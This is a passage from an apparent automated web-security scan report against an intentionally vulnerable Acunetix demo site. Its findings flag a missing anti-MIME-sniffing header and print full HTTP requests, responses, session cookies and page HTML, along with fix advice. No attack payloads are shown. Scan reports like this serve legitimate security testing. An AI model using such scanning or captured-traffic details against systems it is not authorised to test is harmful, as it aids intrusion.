virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        33. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        34. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
